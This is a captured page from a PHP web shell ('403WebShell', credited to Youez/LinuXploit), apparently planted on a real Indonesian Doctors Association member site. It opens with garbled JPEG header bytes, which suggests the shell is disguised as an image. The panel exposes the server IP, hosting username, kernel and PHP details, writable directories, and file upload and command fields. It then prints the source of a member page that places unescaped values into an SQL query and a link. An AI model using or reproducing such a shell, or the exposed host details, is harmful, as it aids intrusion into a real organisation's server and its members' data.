JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 185.124.137.82  /  Your IP : 216.73.217.31
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/alurp2kb_30.php
<?php include "header.php"; ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<title>Untitled Document</title>
 <link rel="icon" href="idilogo.png">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

	<meta charset="UTF-8">
	<title>Ikatan Dokter Indonesia</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
		
<html>
<head>
<!-- /WhatsHelp.io widget -->
<style type="text/css">
<!--
.style1 {font-family: Arial, Helvetica, sans-serif}
.style2 {font-size: 16px}
.style3 {font-size: 18px}

-->
#button-blue{
	font-family: Arial, Helvetica, sans-serif;
	
	width: 50%;
	border: #fbfbfb solid 4px;
	cursor:pointer;
	background-color: #3498db;
	color:white;
	font-size:18px;
	padding:5px;

	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	transition: all 0.3s;
    margin-top:10px;
    font-weight:700;
	float:left;
	   margin-left:250px;
}

#button-blue:hover{
	background-color: #dedede;
	color: #0493bd;
}
.ease {
	width: 0px;
	height: 74px;
	background-color: #fbfbfb;
	-webkit-transition: .3s ease;
	-moz-transition: .3s ease;
	-o-transition: .3s ease;
	-ms-transition: .3s ease;
	transition: .3s ease;
}


@media only screen and (max-width: 580px) {
	#button-blue{
		left: 3%;
		margin-right: 3%;
		width: 100%;
		margin-left: 3%;
		padding-left: 3%;
		padding-right: 3%;
		font-size: 14px;
	}
	.container img{
		width: 100%;
		
	}
</style>
</head>
<body>
	<div align="center"><img src="../file/idi.jpg" width="84" height="84"></center></div>

<div class="container">

	  <div class="panel-body">
	            <div>
		<?php
				$npm=$_SESSION['npm'];
	            $hari = date('Y-m-d');
				$sqlSiswa = mysqli_query($konek, "SELECT * FROM h_anggota WHERE npm='$npm'");
				$dk=mysqli_fetch_array($sqlSiswa);
			
				
                $iuran27 = isset($dk['tgliuran']) ? $dk['tgliuran'] : null;		
        ?>                 
 <?php

function tgl_indo($tanggal){

	$bulan = array (

		1 =>   'Januari',

		'Februari',

		'Maret',

		'April',

		'Mei',

		'Juni',

		'Juli',

		'Agustus',

		'September',

		'Oktober',

		'November',

		'Desember'

	);

	$pecahkan = explode('-', $tanggal);

	

	// variabel pecahkan 0 = tanggal

	// variabel pecahkan 1 = bulan

	// variabel pecahkan 2 = tahun

 

	return $pecahkan[2] . ' ' . $bulan[ (int)$pecahkan[1] ] . ' ' . $pecahkan[0];

}

 

//echo tgl_indo(date('Y-m-d')); // 21 Oktober 2017



 

//echo tgl_indo( $mbstr1); // 15 Februari 1994						

						

		?>					

					
					
  <center>
	    <h2 class="style1 style3">Permohonan Pengajuan Perpanjangan STR Dokter Umum</h2><br/>	</center>
					
<br><br>
	<?php
							if ( $iuran27<="2022-12-31"){
							?>
	
 <center><h4>Iuran anda Sudah Expired Mohon Update/Revisi  Iuran atau Kontak Admin Keuangan IDI</h4><br/>	
<b>Iuran anda berakhir : <?php 	echo tgl_indo( $iuran27)	?></b></center>
		  
		  <br>
		  <p align="center"><a class='btn btn-danger btn-sm' >Revisi Iuran</a>
		  
					
	<?php
							}else{
							?>
					<br>
					<p align="center"><a class='btn btn-success btn-sm' href='pra_registrasi_p2kb.php?npm=<?php echo $npm ?>&nmlead=<?php echo $nmlead ?>&view=2'>Permohonan Pengajuan Perpanjangan STR Dokter Umum</a>
					
	<?php
							}
							?>


									 
							<br><br>
		</div>



</div>
  	 <br/>
      
   <br/>

  <br/>  <br/> 


Youez - 2016 - github.com/yon3zu
LinuXploit